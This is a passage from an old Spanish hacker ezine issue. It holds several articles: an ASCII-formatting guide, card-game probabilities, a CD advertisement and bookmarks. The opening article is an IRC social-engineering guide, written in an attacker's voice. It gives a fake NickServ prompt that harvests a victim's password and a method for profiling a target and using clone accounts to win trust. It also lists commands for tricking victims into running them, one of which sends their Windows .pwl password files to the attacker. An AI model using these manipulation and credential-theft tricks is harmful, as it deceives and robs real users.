<nosotros> * (1) Autentificar su nick *
<nosotros> * (2) Desregistrar su nick *
<nosotros> * (3) Ayuda *
<nosotros> * *
<nosotros> * Que opcion escoge ? *
<victima> 1
<nosotros> * *
<nosotros> * Ha escogido: 1, AUTENTIFICACION DE NICK. *
<nosotros> * *
<nosotros> * Nombre de usuario: victima *
<nosotros> * Introduzca la contrase~a: *
<victima> pw10169
<nosotros> pw10169... Contrase~a aceptada bienvenid@ a casa ;)

No me direis que no es ingenioso ;), ademas si tienes prisa es un truco
que da bastantes buenos resultados en victimas novatas.

- El metodo dificil: -

Pues es el enga~o de toda la vida, pero mas sofisticadamente si cabe, pues
como veremos se necesita mucha practica y una cantidad de datos de la
victima que nos ayudara a hacer un ataque "a medida". Un metodo bueno es
el que uso yo, consiste hacer creer a la victima que aquello que nos
ofrece otra persona (un clon nuestro) es muy bueno para ve a saber tu que
y que lo acepte... O que esa frase que nos hace escribir esa persona hace
maravillas y vete a saber tu que mas... La excusa por la que le enga~eis
se puede cambiar... Por si no ha quedado claro pondre un peque~o esquema
de como se tiene que hacer:

Fase 1 ) Recopilacion de datos de la victima.


-> Nombre
-> Ocupacion
-> Aficiones
-> Estado civil
-> Sexo
-> Conocimiento de la informatica.
-> Curiosidades

Es importante recopilar todos estos datos para hacer un esquema de lo que
queremos. Acto seguido hay que presentarnos ante el, en ese caso daremos
nuestros datos falsos. Una vez tengamos claro con quien estamos hablando
necesitaremos aprovecharnos de sus debilidades (si busca pareja, si es un
adicto al futbol, etc...) y transformarnos en una persona interesante para
el, ofreciendole aquello que sabemos no puede rechazar, ( amor, entradas
para ir al futbol... ) y nos iremos haciendo amigos de el poco a poco...
Una vez conseguido el que su atencion recaiga en nosotros, hace falta
meter un clon en escena, en este caso el sera el que le enga~e... Nuestro
clon no hara ningun privado ni nada a la victima, y suponiendo que nuestra
victima esta en el canal #amor y #mas_amor un clon debe estar en un canal
y nosotros en otro ya que el servidor de IRC detecta expone en medio del
canal los clones que tenemos y no es plan que nuestra victima vea por
vamos. Seguimos, ya tenemos el clon en #mas_amor donde se encuentra la
victima y nosotros en #amor, donde tambien se encuentra la victima. Pues
le decimos a la victima que fulano (nuestro clon) tiene una lista de
personas que buscan pareja, o regala entradas para el futbol, o regala
videos porno (joder con fulano ) o lo que sea que le interese, entonces
la victima procedera a hacerle un privado donde se encuentre nuestro clon
y a pedirselo... Que no cuela lo de la frase o lo del troyano ?? pues el
unico que habra fracasado sera nuestro clon, ya que nosotros aparentaremos
no saber nada del tema de lo que el intentaba hacer y la victima seguira
hablando con nosotros... Y aun no la hemos perdido, podemos probar con
otro clon cambiando la tecnica, y asi las veces que haga falta... De esta
manera *atamos* la victima a nosotros y la confiamos a unos clones que
si no la enga~an a la primera lo haran a la segunda, o a la tercera...
Este metodo funciona la gran mayoria de veces exceptuando aquella gente
que no es tan inocente o que no son tan novatos.


(--3--)- Como se consigue el enga~o ? -(---------------------------------)

Ahora vamos a tratar la ingenieria social desde sus bases mas generales,
si es que se puede decir asi, explicando en que consiste el enga~o mas
detalladamente para que sepais en que se basan los tipos de enga~os ya
vistos.
El enga~o se consigue al hacer que la atencion de una persona recaiga
sobre ti, confiando en ti, y consiste en hacer que la victima, en un
exceso de confianza, de el visto verde a todo lo que le digas porque para
el eres alguien que sabe que no le hara nada malo. Una vez has llegado a
hacer que la victima centre tu atencion en ti, que responda a todos los
privados que la haces rapidamente, que se ofrece muy simpatico y demas,
es que te tiene en su lista de amigos... Y es en ese momento donde se le
sugiere a la victima que haga esto o lo otro favoreciendote a ti. Cuando
la victima haya accedido a lo que tu le hubieras pedido y hayas
conseguido tu objetivo, lo eticamente recomendable para no herir a la
victima seria hacerte amigo de el/ella diciendole que lo que has hecho
no era para fastidiarle y que no le has hecho nada malo, y si la victima
no se lo toma mal pues ya tienes otro amigo :-). Eso es ser un buen
ingeniero social, eso y no otra cosa. Se que algunos esto ya lo sabiais
pero no olvideis que este texto intenta ser muy ameno y de facil
comprension para todos los leen esto ( no es que vea a muchos... )

(--4--)- Mas trucos -(---------------------------------------------------)

Ahora que estais de verdad mentalizados de lo que es ser un ingeniero
social, os voy a armar con un peque~o arsenal de trucos que nunca vienen
mal. Todas estas frases tienen que ser introducidas por la victima y
provocan efecos secundarios.

o.o.o.o.o.o.o.o.
/server opme <--- Le desconecta del IRC.
o.o.o.o.o.o.o.o.

o.o.o.o.o.o.o.o.o.o.o.
/msg nickserv kill <--- Le desregistra el nick.
o.o.o.o.o.o.o.o.o.o.o.

o.o.o.o.o.o.o.o.o.o.
/join 0 helpdesk <--- Se va de todos los canales.
o.o.o.o.o.o.o.o.o.o.

o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o
/send c:\windows\*.*pwl tu_nick <--- Te manda todas sus .pwl ;)
o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o.o

o.o.o.o.o.o.o.o.o.o.o.o.o
/fserve tu_nick 5 c:\ <--- Ver "el arte de la ingenieria social".
o.o.o.o.o.o.o.o.o.o.o.o.o

o.o.o.o.o.o.o.o.o.o.o.o.o
Inicio/ejecutar/con/con (esta no se introduce desde el cliente de IRC)
o.o.o.o.o.o.o.o.o.o.o.o.o

(--5--)- Los consejos del abuelo -(--------------------------------------)

Aqui van algunos consejos para que vuestra labor como ingenieros sociales
sea fructifera. Se podria decir como los mandamientos de todo ingenierio
social precavido.

Regla num.1
" Antes de ir a cazar una victima, preguntate a ti mismo, que es lo que
deseas obtener de el, como se lo tomara, y como se lo debes proponer.
Piensalo cosa de dos minutos, relajate y comienza a hablar con el. "

Regla num.2
" Al primero que deberas saber enga~ar no es a otro que tu mismo, debes
proponerselo a la victima de tal manera que si te lo hicieran a ti tu no
sospecharas nada. "

Regla num.3
" Aqui no conoceras a nadie por su nick, no te fies de las apariencias,
pues enga~an. "

Regla num.4
" Nadie regala nada, si quieres que la victima acceda a lo que propones
por lo menos le debes haber ofrecido algo. "

Regla num.5
" Cuando las cosas se ponen malas, vete, desconectate y vuelvete a
conectar con otro nick y otros datos, y no entres en el canal de la
victima hasta que esta se haya ido. "

Regla num.6
" Debes de conocer a la victima casi tanto como a ti mismo, conoce sus
gustos, sus debilidades y todo lo que puedas. "

Regla num.7
" Nunca te enfades con tu victima antes del enga~o. "

Regla num.8
" No destruyas ninguna informacion ni hagas mal uso de la que le cojas, a
no ser que haya fotos infanticidas, si es ese el caso, borralas. "

Estas son las reglas basicas, pero no las unicas.

(--6---- Despedida ------------------------------------------------------)

Antes de irme querria aclarar dos asuntos pertinentes al anterior articulo
que se publico en este mismo ezine: Primero que lettera ha sufrido una
reestructuracion total de manera que no hace falta estudiarse las cookies.
Y segunda que gracias a algunos miembros de la scene mi idea de cuando
comenzaba el tercer milenio ha cambiado, ahora no estoy ni en un bando ni
en otro, no estoy seguro de la existencia del a~o cero y prefiero seguir
leyendo sobre ello...
Y como mi madre me dice que irse sin despedirse de los demas es de mala
educacion es de mala educacion, no me voy a ir de aqui sin saludar a...
Doing, a Ripe y a g.legend.

" Eche que entra en un bar y dise... "

Tahum. (tahum@demasiado.com)

*EOF*



-< 0x07 >-------------------------------------------------.--------------.--
`-[ SET Staff )-ï

Es un pajaro?....
Es un avion? ....
Es un ovni? ....

NO!.

Es 'Er Pako Underground'. Ole la raza.

Un CD repleto de info underground que Er Paco <er_pako@teleline.es> puso a
disposicion de SET alla por fines del 99/principios del 00 pero que con la
habitual disposicion organizativa que nos caracteriza no aparecio
comentado en SET 22 tras lo cual Er Pako reenvio cinco, si 5, copias de la
nueva y mejorada version

Dejemos que el representante oficial de Pakosoft nos lo cuente..

ER_PAKO UNDER:

- Cursos y Tutoriales: ha sido a~adidos nuevos cursos y se han
quitado los obsoletos.

- Docs Varios: A~adidos algunos textos informaticos y algo de
papiroflexia

- Imagenes varias: alguna que otra nueva.

- Intros: Nada nuevo.

- Mini distribuciones linux: A~adida la HV Linuz 0.22.

- Risa: - Bastantes chistes e historias nuevas, nuevas secciones
de imagenes graciosas, sonidos musica y videos cachondos (genial).

- Canal +: nuevas versiones de los programas de descodificacion

- Docs. Hack: actualizacion total, cantidad de textos.

- E_Zines: en la seccion estrella han sido a~adidos todas la
publicaciones nuevas qye han aparecido, asi como los nuevos numeros
de las ya existentes.

- Numeros de serie: A~adidas nuevas versiones de los
programas.

- Paginas Webs Hackeadas: nueva seccion.

- Personalizacion de Windows: Nueva seccion en la que
encontraras facilidades y programas para darle un nuevo aire a tu
Windows, especial mencion a las modificacion del explorer.exe hecha
por mi con la que tu boton inicio pasare a llamarse ER_PAKO.

- Proteccion de CDs: nueva, sin comentarios.

- Utilidades Hack: Totalmente actualizada.

- Virus: Coleccion personal de Virus compuesta por mas de
15.000 diferentes, codigos fuente, troyanos, creadores, informacion..


Ademas en plena bonanza economica, Espa~a va bien, Pakosoft lanza:
Er Pako Programas, un completo CD con todo lo necesario para que un
ordenador recien estrenado se convierta en una estacion totalmente
equipada con todos los programas que son imprescindibles para trabajar
y/o divertirse.


Er Pako agradece a las siguientes webs el trabajo realizado y os recomienda
que no les quiteis el ojo de encima.


ZINE_STORE: Un trabajo muy currado: es de donde me he bajado muchos de
los E_ZINES hispanos que podeis encontrar en mi CD. Surf.to/zs

La Taberna de Van Hackez: Un poco descuidada ultimamente pero muy
buena ante todo y bien clasificada. www.vanhackez.com.

El Portal: Actualizan a diario, es muy clara y las webs asociadas por
lo general son muy buenas. Elportal.metropoli2000.net.

DarkPort: Otro buen portal de temas Hack. Darkport.cjb.net

El agujero Negro: Buena web variada, lastima que no actualicen mas a
menudo. Agujero.com

Y por supuesto a vosotros, los miembros de SET, la gloria del Hack
espa~ol, y ademas originarios de MURCIA, (yo de un pueblo de la
costa Murciana).


Er_Pako

*EOF*


-< 0x08 >-------------------------------------------------.----------------.-
`-[ RagPutana )-ï





/-------------------------------------------------------------------\
\ __ /
/ | O| \
\ |__| _ _ _ /
/ || __ ___ __ (_ ( _) ___ \
\ (__) (__) (_ (__) (__) (_ (__) _) (_) (_ /
/ ======================|============================== \
\ t /
/ ____ _____ _____ ___ ___ \
\ ___ _ ___ #____# #____ # # # /
/ | (_ \/ | __ # # # # # # \
\ | (_ /\ | (__) # # _____# #_____ _#_ _#_ /
/ ======================================================== \
\___________________________________________________________________/

-=================================================-
Por //RagPutana\\ para la gente de "SET Ezine"
-=================================================-
Email:ragputana@yahoo.com


Seguramente este articulo no tenga que ver mucho con el hacking,
dado que no aporta gran cosa al excelente trabajo que estan haciendo
la gente de SET . Pero si tenemos en cuenta que en el mundo UNDERGROUND
el uso de texto en formato ASCII es lo mas habitual a la hora
de redactar Ezines y toda clase de manuales, por que no dedicar unas
lineas a este tema. Y es asi como me teneis aqui escribiendo sobre
el texto en ASCII.

Este articulo pretende ser una ayuda a la hora de escribir y formatear
texto en ASCII, y asi conseguir que la gente que quiere dar sus
ideas a conocer disfrute de este precioso y agradable formato con
todas sus ventajas. (no hay ni que decir que el Ezine SET tiene
un formato ASCII elegante, me encanta ;-)


_____________________________________________
Este articulo tiene los siguientes apartados:

(A)- POR QUE USAR "ASCII"?
(B)- COMO USARLO.
(C)- RECURSOS "ASCII" EN LA RED.
_____________________________________________

Y sin mas preambulos nos centramos en el asunto, y empezamos
por enterarnos que es eso del texto ASCII.

(para la gente mas quisquillosa o como curiosidad
A.S.C.I.I. es "American Standard Code for Information
Interchange"(creo), in spanish "Codigo Standar Americano
para Intercambio de Informacion" le podriamos llamar
CSAII he,he!)


==========================
(A)- POR QUE USAR "ASCII"?
==========================

Ya creo que a estas alturas estaras bastante convencido de la utilidad
de este formato, ya que estas leyendo estas lineas escritas en
ese formato, si no es asi sigue con la lectura a ver si logro
convencerte.

Nos os voy a dar 1000 razones, solo me conformo con las siguientes
3 que me parecen que son las mas solidas, y que a mi realmente
me convencen. Son estas las razones por las que el formateo en
ASCII es ideal para el mundo UNDER, y las que facilitan la
libertad de informacion:

1.- ES UN STANDAR.

El formato es standar, eso quiere decir que se puede leer
desde distintas maquinas,

  
sistemas operativos, o programas.
Con esto un hacker puede lograr que lo que el quiere
decir llegue lo mas lejos posible, y que nadie tenga
ninguna traba a la hora de leer esto. Es tan estandar
que mi viejo MSX (un ordenata de los 80) usa el mismo
codigo.

Ademas hay que tener en cuenta que no salen nuevas versiones,
como nos puede pasar con un documento escrito en WORD 97, que
no es posible abrirlo con WORD 6.0, por lo que tenemos que
actualizar esa birria de procesador de textos una y otra
vez.

2.- OCUPA POCO ESPACIO.

La informacion que se guarda con este formato es solo
texto, por lo que ocupa mucho menos que cualquier otro
formato como puede ser el el WORD de Micro$oft. Ademas
pierde un gran volumen al ser comprimido por ZIP, se
queda en un 45 o 30%. Todo esto hace que se pueda guardar
una gran informacion en muy poco espacio.

Esto produce que el gasto telefonico sea lo mas peque~o
posible a la hora de bajar informacion de la red, en 5
minutos se pueden bajar manuales que dan mas de 5 horas
de lectura (una ganga, por cierto yo mismo me devoro
toda clase de manuales en mis ratos libres y es una lectura
que no me cuesta casi nada, por no decir nada ;-)

3.- SE PUEDE MODIFICAR.

El texto producido en formato ASCII esta abierto a
modificaciones, se puede cortar, pegar, borrar...
asi el lector puede mejorar y aprovechar lo que se escribe.
Asi la informacion contenida en este formato puede
ir mutando y por supuesto ira mejorando con el tiempo.
(como un buen vino, aunque al final caduque he,he!)

Esto produce que los creditos puedan ser facilmente
cambiandos, pero aun asi el hacker confia bastante en el
lector. (Yo personalmente no conozco ninguna situacion en
la que alguien haya cambiado los creditos)


Como veis todas estas razones van unidas a la LIBERTAD DE INFORMACION
que reclama la etica hacker. Supongo que si lees este Ezine estaras
de acuerdo con todo lo aqui dicho, aun asi estoy abligado a recordar
que simplemente es mi opinion, y que quizas tu no estes de acuerdo y
que lo dicho por mi te parezca una chorrada.(por que no?:-P)


=================
(B)- COMO USARLO.
=================

A la hora de usar este formato realmente no hay ninguna regla
escrita, por lo tanto el limite esta mas o menos en la imaginacion
y habilidad que cada uno tenga. Tan solo tener unas cuantas
pautas como las que nos dan desde SET:

_________________________________________________________________________
________________________[pautas de SET]__________________________________
Tratad de respetar nuestras normas de estilo. Son simples y nos facilitan
mucho la tarea. Si los articulos los escribis pensando en estas reglas,
nosotros podremos dedicar mucho mas tiempo a escribir mas articulos y al
Hack ;)


- 80 COLUMNAS (ni una mas, que no me pagan por maquetar lo ajeno!)

- Usa los 127 caracteres ASCII, esto ayuda a que se vea como dios
manda en todas las maquinas sean del tipo que sean. El hecho
de escribirlo con el Edit de DOS no hace tu texto 100%
compatible pero casi. Mucho cuidado con los dise~os en ascii
que luego no se ven bien. Sobre las e~es, cuando envias un articulo
con ellas nos demuestras que esto no lo lee nadie.
__________________________________________________________________________


Por si alguien no sabe cuales son los 127 caracteres de ASCII
de que nos hablan, he recogido la siguente lista:

_____________________________________________________________________
__________[Regular ASCII Chart (character codes 0 - 127)]____________
000 (nul) 016  (dle) 032 sp 048 0 064 @ 080 P 096 ` 112 p
001  (soh) 017  (dc1) 033 ! 049 1 065 A 081 Q 097 a 113 q
002  (stx) 018  (dc2) 034 " 050 2 066 B 082 R 098 b 114 r
003  (etx) 019  (dc3) 035 # 051 3 067 C 083 S 099 c 115 s
004  (eot) 020  (dc4) 036 $ 052 4 068 D 084 T 100 d 116 t
005  (enq) 021  (nak) 037 % 053 5 069 E 085 U 101 e 117 u
006  (ack) 022  (syn) 038 & 054 6 070 F 086 V 102 f 118 v
007  (bel) 023  (etb) 039 ' 055 7 071 G 087 W 103 g 119 w
008  (bs) 024  (can) 040 ( 056 8 072 H 088 X 104 h 120 x
009 (tab) 025  (em) 041 ) 057 9 073 I 089 Y 105 i 121 y
010 (lf) 026 (eof) 042 * 058 : 074 J 090 Z 106 j 122 z
011 (vt) 027  (esc) 043 + 059 ; 075 K 091 [ 107 k 123 {
012 (np) 028  (fs) 044 , 060 < 076 L 092 108 l 124 |
013 (cr) 029  (gs) 045 - 061 = 077 M 093 ] 109 m 125 }
014  (so) 030  (rs) 046 . 062 > 078 N 094 ^ 110 n 126 ~
015  (si) 031  (us) 047 / 063 ? 079 O 095 _ 111 o 127 
______________________________________________________________________


Como veis son estos 128 los caracteres que corresponden a cada
numero, y los que son totalmente standares casi en cualquier maquina.
Los que funcionan siempre son los del 33 al 126. Los demas dan
problemas.

Si os habeis fijado no hay ni e~e, ni tildes, esto es un problema
a la hora de escribir en castellano. Como solucion se suprimen
las tildes y en lugar de la e~e se usa el codigo 126 ~.

Por cierto si alguien que esta leyendo esto no sabe como escribir,
~, {, }, ?... o cualquier otro simbolo hay un peque~o truquillo:

Se mantiene ALT pulsado y con la otra mano se teclea en
el teclado numerico el codigo que corresponde al caracter,
despues se suelta ALT y aparece el caracter.

ALT + 126 (teclado numerico) = ~


Otra cosa que tendriamos que hacer, seria comprobar como se ve
el texto con diferentes editores, por lo menos habria que
probarlos con los siguientes, ya que todos no usan el mismo
salto de linea:

En Windows: EDIT del dos y el Block de notas. (esto como minimo)
Linux : Cualquiera, pico, vi...

Cuando hagamos la prueba con mayor cantidad de editores mas
seguros estaremos de la compatibilidad del texto.

Tambien es conveniente que nos fijemos como estan escritos los textos
de los demas, es asi como se aprende la mayoria de las cosas.
(osea que ya sabeis leer mucho SET). Al escribir o leer un articulo
no os quedeis solo con el contenido, mirad y apreciar el formato,
es algo que se agredece mucho.

No estaria de mas que intentarais crear vuestro ASCII-ART.(se le
llama asi a los dibujos creados con caracteres ASCII, como el
titulo de este articulo, que por cierto es un poco chapucero ;-)


================================
(C)- RECURSOS "
ASCII" EN LA RED.
================================

Principalmente os recomiendo que visiteis sitios que traten
sobre "
ASCII ART". Como recomendacion en estos sitio podeis
encontrar gran cantidad de ejemplos, asi como recopilaciones
comprimidas en ZIP:

The Great Ascii Art Library.
http://www.geocities.com/SouthBeach/Marina/4942/ascii.htm

The Ascii Art Dictionary (Andreas Freise)
http://www.ascii-art.de

Ascii Art en castellano:
http://www.euskalnet.net/puravida/asciiart.html

Tambien podeis ir a las NEWS, aqui podreis ver trabajos hechos
casi por cualquiera o pedir ayuda para encontrar algo concreto.
La verdad es que hay gente muy maja que siempre ayuda:

NEWS: alt.ascii-art

Si vais a consultar las news en un programa como Outlook o cualquier
otro, teneis que escojer un tipo de letra que tenga todas las
letras del mismo tama~o como "
Courrier New", si no el ASCII ART
no se podra apreciar.

Tambien hay algunos editores para editar texto ASCII que nos ofrecen
algunas facilidades como el ajuste linea automatico, a mi personalmente
no me gustan, pero os recomendio que los probeis.

Realmente no se si este ultimo apartado tiene mucho sentido, ya
que es suficiente poner ASCII en cualquier buscador y seguramente
__________________________________________ podreis encontrar graficos
_________[Ejemplo de ASCII ART]___________| como el que veis aqui
) ( | a la izquierda.
/( (\___/) )\ _____________ |
( #) \ (- -) ( # | '\\\\\\ | Si vuestra imaginacion no os
||___c\ >'__| | ' ____|_ | da para ver lo que esta
||**** )`_/ **' | + '||:::::: | dibujado yo os echo una mano:
.__ |'* ___| |___*' | '||_____| |
\_| |'*( ~ ,)' \'_______|_____| | "
Es un diablo con su
)) |' /(. ' .)\ ___/____|___\___ | ordenata"
(( _"""
;!___*_____\_| _ ' <<<:||
/ /| |_________'___o_o|| Seguramente es uno de esos
/_____/ / | hackers que ha hecho algun
|:____|/ | pacto con el mismo demonio.
__________________________________________| Yo personalmente prefiero

seguir aprendiendo en esto del hacking que dejar mi alma por ahi.
Alla vosotros si os seduce la idea de vender vuestro alma por
convertiros en un "superhacker". Si alguien puede escribir
sobre una experiencia como esta que se anime a hacer un articulo,
que miedo! =:-{

=======================================================================
Supongo que todo lo expuesto aqui puede servir como ayuda para empezar
lo demas va a vuestra cuenta y sois vosotros los que teneis que hacerlo
=======================================================================

Saludos a todo el mundo que se mueve por el hacking y hasta otra.
___________________________________
(no copyright) RagPutana Mayo 2.000
_-==============================-_

[ Editor: Parece que por fin esta empezando a calar eso de tomarse un
poco la molestia de formatear los articulos y apreciar el ASCII ]



-< 0x09 >-------------------------------------------------.---------------.--
`-[ Hendrix )-ï



Como ganar al 7 y medio
-----------------------

1. Introduccion

Pues aqui estoy otra vez con otro nuevo estudio matematico-estadistico-inutil
de como ganar a otro juego de azar. En este caso he analizado el juego del
7 y medio. El juego es tan conocido que el que no sepa jugar que aprenda
primero, porque no pienso rebajarme a explicar un juego tan cutre.

En el juego hay dos situaciones basicas:
Ser la Banca
Ser un jugador normal

Como la banca gana en caso de empate, a priori es evidente que tiene
mas posibilidades de ganar que el resto de jugadores. Por ello
siempre que podamos seremos banca.


2. Jugador normal

Cuando le toca el turno a jugador, este tiene una carta escondida y
dos opciones posibles: Pedir carta o plantarse. Es evidente que si
tienes un 1 pediras otra carta (a menos que quieras pegarte un Farol),
en cambio si tienes un 7 las posibilidades de pasarte son muy grandes.

El problema se resume en: Pido carta o me planto?

La respuesta estadistico-matematica es clara:
Si tienes mas posibilidades de no pasarte que de pasarte, entonces
pide otra carta. Pero, que posibilidades tengo de pasarme con un "6"
si pido otra carta?. Pues contemos las cartas.


Suponiendo que hay 1 baraja con los numeros de 1 al 7 y tres figuras
(sota, caballo y rey) tenemos 40 cartas.
Por lo que el 50% lo obtenemos con 20 cartas.
Seguimos contando; hay 12 figuras, por lo tanto hay una probabilidad
de 12/40 de sacar 1/2, osea un 30%.
De esto deducimos que hay, en principio, un 70% de posibilidades de pasarte
si tienes un "7" y pides otra carta.

Y con un "6"?, pues las combinaciones para no pasarse son dos: que
salga un 1 o que salga una figura, en total 16 combinaciones
(4 ases y 12 figuras) osea, un 16/40 = 40% de posibilidades de no pasarte.

Tabla comparativa

Tienes un: Combinaciones favorables Probabilidad de triunfar
si pides otra carta

7 12 figuras(1/2) = 12/40 30%
6 12 + 4 ases = 16/40 40%
5 2, 1 o 1/2 = 20/40 50%
4 3, 2, 1 o 1/2 = 24/40 60%
3 4, 3, 2, 1 o 1/2 = 28/40 70%

etc...

En vista de esta primera tabla se deduce lo siguiente: Si tienes un 4
o menos debes pedir carta, si tienes un 6 o mas debes plantarte y
si tienes un 5 es indiferente lo que hagas.

Aunque no lo hemos mencionado, el caso de tener "6" o tener "6 y 1/2"
es identico ya que si sale un "2" nos pasamos igualmente en ambos casos.


1. Contar las cartas

Hasta ahora hemos supuesto probabilidades sobre la baraja completa
(40 cartas) pero lo cierto es que en una partida normal hay muchas
cartas que estan sobre la mesa y si las contamos podemos variar las
probabilidades finales. Por ejemplo,

Imagina que el primer jugador se ha pasado ya que tenia un 4 y le ha
salido un 7.
Tu eres el segundo jugador y tienes un 5, sigue siendo la
probabilidad de pasarte del 50%?, No.
En este caso deberias descontar el "4" y el "7" del primer jugador
y tu propio "5", sigue habiendo 20 cartas a tu favor pero solo 17
en contra. O sea la probabilidad es de 20/37 = 54% de no pasarte.

En cambio si el primer jugador hubiera sacado 3 figuras y dos "2" sin
pasarse significa que hay 6 cartas por debajo de 3 sobre la mesa (las 5
vistas del primer jugador mas la que tiene escondida que seguro que es
menor de 3). En este caso, tus posibilidades de no pasarte son: 14/33 = 42%
Conclusion: plantate.

En general si han salido muchas figuras y pocos numeros altos es
mejor plantarse, si es al reves es mejor pedir.


2. Sacar 7 y 1/2

Por el momento no hemos contemplado la regla que dice que sacando 7 y
medio la banca paga el doble. Este hecho es muy importante ya que las
probabilidades cambian completamente.
Concretamente la esperanza de ganar es igual a la probabilidad de
ganar por el valor del premio. (E = p * premio).
Hasta ahora estabamos suponiendo que el premio era siempre igual a
"1", pero en el caso de "7 y 1/2" el premio es igual a "2".

De este modo la esperanza de ganar teniendo 7 y pidiendo una carta es:

12*2 / 40 = 60 %

O sea que cuando tienes un 7 lo mejor es pedir carta, ya que el riesgo
de pasarte queda compensado con el premio doble que supone sacar 7 y
medio.

Tabla comparativa

Tienes un: Combinaciones favorables Probabilidad de triunfar
si pides otra carta

7 12*2/40 60%
6.5 [4*2 + 12]/40 50%
6 [4 + 12]/40 40%
5.5 [4*2 + 4 + 12 ]/40 60%
5 [4 + 4 + 12]/40 50%
4.5 [4*2 + 4 + 4 + 12]/40 70%
4 [4 + 4 + 4 + 12]/40 60%


Explicacion: En el caso de 5.5 hay cuatro "2" en la baraja que
provocarian un 7 y 1/2 si saliesen, por lo tanto tienen un valor doble.

Los resultados son curiosos sobre todo en el caso del 5.5 ya que las
probabilidades de que merezca la pena pedir otra carta son
claramente favorables.
Nos sigue quedando los casos del 6.5 y el 5 donde la probabilidad es
del 50% y no sabemos que hacer.
En estos casos yo pediria carta ya que podriamos llegar a 5.5 o a 7 y
entonces pedir una segunda carta. Por otro lado no olvidemos contar
las cartas ya que modifican las probabilidades!!!

En resumen: Siempre pedir carta a menos que tengas un 6 o que hayan
salido mas figuras que cartas altas


3. Cambiar las reglas

El juego del 7 y 1/2 es muy simple y seguramente cuando juegues
alguna partida llegaras a las mismas conclusiones haciendo calculos
que por intuicion o por experiencia.
Esto es debido a la Ley del Jugador Experto (inventada por mi)
que dice que:

"Un jugador experto, inconscientemente, tiende a realizar siempre
las mejores jugadas desde el punto de vista matematico-estadistico"
.

O lo que es lo mismo, hacer calculos no te garantiza el ganar, tan solo
te garantiza que tus jugadas son tan buenas como las de un autentico
jugador experto en el juego.

Asumiendo esta ley, la mejor manera para ganar al jugar con jugadores
expertos es cambiar las reglas del juego. De este modo las probabilidades
de ganar cambian y el jugador experto pierde toda su experiencia.
En cambio el matematico puede recalcular las probabilidades y seguir
jugando al maximo nivel.

En el caso del siete y medio hay una variante muy conocida que cambia
todas las combinaciones: El truco consiste en utilizar una baraja entera y
proponer que el "8" y el "9" valgan 1/2. En este caso el numero de cartas
pasa a 48 y el numero de cartas que valen 1/2 pasa a 20. los resultados son:


Tienes un: Combinaciones favorables Probabilidad de triunfar
si pides otra carta

7 20*2/48 83%
6.5 [4*2 + 20]/48 58%
6 [4 + 20]/48 50%
5.5 [4*2 + 4 + 20]/48 66%
5 [4 + 4 + 20]/48 58%
4.5 [4*2 + 4 + 4 + 20]/48 75%
4 [4 + 4 + 4 + 20]/48 66%


O sea, que hay que pedir carta SIEMPRE. Esto significa que la banca
acabara arruinada. Recordemos que en anterior caso la banca ganaba
por defecto.
(Me falta por calcular las probabidades de ganar de la banca en ambos
casos pero eso tendria que calcularlo haciendo simulaciones)


4. Despedida

Supongo a nadie le interesa lo mas minimo mis idas de pelota matematicas
con los juegos de azar (la ruleta, los chinos, el 7 y 1/2, etc..).
Pero si te interesa el tema hacker-ludopata no dudes en mandarme un mail a
hendrix66@iname.com o hendrix@lettera.net,

Hasta otra
Hendrix






-< 0x0A >-------------------------------------------------.---------------.--
`-[ SET Staff )-ï



B_ O_ O_ K_ M_ A_ R_ K_ S_



Nuestro Bookmark de este numero tiene nuevas web que hemos considerado
curiosas. Sois libres de enviarnos mas direcciones que considereis
utiles o interesantes. A la direccion de siempre :

<set-fw@bigfoot.com>


--[ http://www.ntop.org ]

Util programa para estar al tanto del trafico que circula por nuestra
red, incorpora un peque~o servidor web (con algun que otro fallo de
seguridad reportado) y puede servir de ayuda en mas de una ocasion.

--[ http://www.antioffline.com ]

Podriamos decir que esta pagina es un 'tributo' de Sil a JP pero
eso la convertiria en una mas de las multiples paginas dedicadas
al mismo fin. Ademas de eso Antioffline esconde varias sorpresas.

--[ http://inmunix.org ]

Aterrado por los desbordamientos de buffer?. Segun todos los estudios
siguen constituyendo el metodo preferido y mas comun de ataque.
Aparte de rezar puedes intentar protegerte usando un sistema operativo
como Inmunix, una version especial de Red Hat Linux que pretende estar
"inmunizada" ante este tipo de fallos.

--[ http:////www.freeweb.pdq.net/headstrong/ ]

Solo dire el titulo de la pagina y ya podeis empezar a imaginar.
"Bizarre Stuff You can Make in your Kitchen".

--[ http://www.napster.com ]

Dudo que haya alguien que no conozca esta pagina, pero como no esta
muy claro si seguira abierta (al menos en su actual forma) os
recomendamos que aprovecheis para ir y fastidiar a la RIAA.


--[ http://www.404.org ]

Entre otras cosas, revistas en la que se mezclan filosofia, biologia,
diatribas anti-sistema, estudios satiricos de la Biblia, la vision
personal del mundo de su autora y la mafia en Minneapolis...
Espera cualquier cosa menos algo convencional.


--[ http//www.mcs.kent.edu/docs/general/hackersdict/03Appendices ]

Una mirada nostalgica, ya se sabe que cualquier tiempo pasado fue
mejor e indudablemente en ocasiones tambien mas divertido.



*EOF*

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT